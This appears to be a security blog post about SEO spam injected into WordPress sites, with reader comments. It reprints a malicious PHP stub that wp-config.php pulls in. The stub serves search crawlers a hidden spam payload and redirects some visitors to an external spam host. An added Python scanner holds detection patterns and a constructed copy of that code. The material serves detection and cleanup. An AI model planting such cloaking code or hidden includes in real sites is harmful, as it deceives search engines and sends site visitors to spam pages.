WordPress SPAM Causing Headaches

Newly Released:

On 11/3/2017 we published our guide on how to secure your WordPress site and it also talks about vulnerabilities and best practices.

It seems that SPAM is all the rage these days. Wonder why? Could it be because it’s a multi-million-dollar business?

In any event, detecting it is always a challenge, as is remediating it. This is what it might look like if you use our free scanner to scan the website:

Sucuri Spam Detection

Besides some of the obvious things, we have started seeing tactics that were previously used against Joomla sites show up on WordPress ones. They are using things like this:

@require_once(ABSPATH . '/wp-includes/Text/cache.php');

You’ll find this in your wp-config.php file more often than not. If you follow the cookie trail you’ll find that the cache.php contains code like this:

<?php
// Cloaking stub dropped as wp-includes/Text/cache.php and pulled in from wp-config.php
$uniq_ua_string=@$_SERVER['HTTP_USER_AGENT'];
$uniq_ref=@$_SERVER["HTTP_REFERER"];
// Treat the visitor as human unless the user agent names a search-engine crawler
$is_human=1;
if (stristr($uniq_ua_string,"googlebot"))$is_human=0;
if (stristr($uniq_ua_string,"bing"))$is_human=0;
if (stristr($uniq_ua_string,"yahoo"))$is_human=0;
// Crawlers requesting the front page are served css.php (the spam payload) instead of the site
if(@$is_human == 0 && preg_match('/^\/(?:index\.(?:php|html?))?$/', @$_SERVER['REQUEST_URI'])) {
@readfile(dirname(__FILE__)."/css.php");
exit;
}
// Visitors arriving from a referring URL that contains "viagra" are redirected off-site
if(preg_match('/viagra/i', $uniq_ref) > 0) {header("Location: http://vaptk.com/in.php?t=v&s=1");exit;}

?>

If you follow the trail further and go to the css.php file you’ll find all kinds of goodies that will be of particular interest:

Sucuri SPAM Payload

What can I say, sometimes it’s all about following the cookie trail.

When removing it, be sure to remove the @require_once line and the payload as well. The good news is that if you’re running our plugin, you’ll quickly identify an integrity issue in wp-includes and wp-config that will allow you to act quickly to rectify the issue. Because of the time of injection, we’d venture to say that the vector is likely compromised credentials to the server, likely via FTP.
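As an added example (not part of the original post or Sucuri's plugin), the script below turns the two tells described above into a scan you can run against a WordPress install: an @-silenced or non-core include in wp-config.php, and a PHP file that fingerprints crawler user agents and readfile()s another file for them, or redirects on the referer. The sample wp-config.php and cache.php contents are constructed to mirror the snippets above; the redirect host is a placeholder.

```python
import re
from pathlib import Path

# Signatures for the injection described above: wp-config.php gains an @-silenced
# require_once of a file under wp-includes/, and that file cloaks for crawlers
# (serves them another file) and redirects visitors based on the HTTP referer.
INCLUDE_RE = re.compile(
    r"(@?)\s*(?:require|include)(?:_once)?\s*\(?\s*ABSPATH\s*\.\s*['\"]([^'\"]+)['\"]", re.I)
CORE_INCLUDES = {"wp-settings.php"}  # the only include a stock wp-config.php makes
CLOAK_RES = [re.compile(p, re.I) for p in (
    r"HTTP_USER_AGENT",
    r"stristr\s*\(\s*\$\w+\s*,\s*['\"](?:googlebot|bing|yahoo)['\"]",
    r"@?readfile\s*\(")]
REDIRECT_RES = [re.compile(p, re.I) for p in (r"HTTP_REFERER", r"header\s*\(\s*['\"]Location:")]

def suspicious_includes(wp_config_src: str) -> list[str]:
    """Include targets in wp-config.php that are @-silenced or not WordPress core."""
    return [target for silenced, target in INCLUDE_RE.findall(wp_config_src)
            if silenced or target.lstrip("/") not in CORE_INCLUDES]

def is_cloaking_payload(php_src: str) -> bool:
    """True when a file fingerprints crawler user agents and readfile()s another file."""
    return all(r.search(php_src) for r in CLOAK_RES)

def has_referer_redirect(php_src: str) -> bool:
    """True when a file reads HTTP_REFERER and issues a Location header."""
    return all(r.search(php_src) for r in REDIRECT_RES)

def scan_wordpress(root: Path) -> list[tuple[str, str]]:
    """Walk a WordPress install and report files matching either signature."""
    cfg = root / "wp-config.php"
    findings = [(str(cfg), f"unexpected include of {t}") for t in
                suspicious_includes(cfg.read_text(errors="ignore"))] if cfg.is_file() else []
    for php in root.rglob("*.php"):
        src = php.read_text(errors="ignore")
        if is_cloaking_payload(src):
            findings.append((str(php), "crawler cloaking: bot UA check plus readfile"))
        if has_referer_redirect(src):
            findings.append((str(php), "referer-triggered redirect"))
    return findings

# Constructed samples modelled on the post's snippets, not files from a real site.
WP_CONFIG_SAMPLE = """<?php
@require_once(ABSPATH . '/wp-includes/Text/cache.php');
require_once ABSPATH . 'wp-settings.php';"""
CACHE_SAMPLE = """<?php $ua=@$_SERVER['HTTP_USER_AGENT']; $ref=@$_SERVER["HTTP_REFERER"];
$is_human = stristr($ua,"googlebot") ? 0 : 1;
if($is_human == 0) { @readfile(dirname(__FILE__)."/css.php"); exit; }
if(preg_match('/viagra/i', $ref)) {header("Location: http://redirect.invalid/");exit;}"""
```

Run `scan_wordpress(Path("/path/to/wordpress"))` against a copy of the site; a hit on wp-config.php plus a hit in wp-includes/ is the pairing the post describes, and both files should be compared against a clean WordPress release before removal.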


Any questions let us know.

4 comments
  1. Hi Tony,

    It’s definitely the rage these days as I usually receive about 300+ SPAM comments or trackbacks a day. I attribute the increase to the success of RBL services and the need of spammers to host their links and poison on legitimate trusted websites.

    Cheers!

  2. Hey Tony — thanks so much for this column. Your company seems to have more info on this than anyone. Hey, we changed our passwords, and of course re-installed WP, but we’re still getting this SEO message at the top. We can’t find any of the code you mentioned and have looked in the header file, css.php, cache.php, wp-config.php, etc. Any idea where it would be hiding? Would it be in a standalone javascript file?

  3. Oh and by the way, we are on a GoDaddy shared hosting situation, which seems to be where many of these hacks take place. Word to the wise to those folks looking to host their WordPress sites…
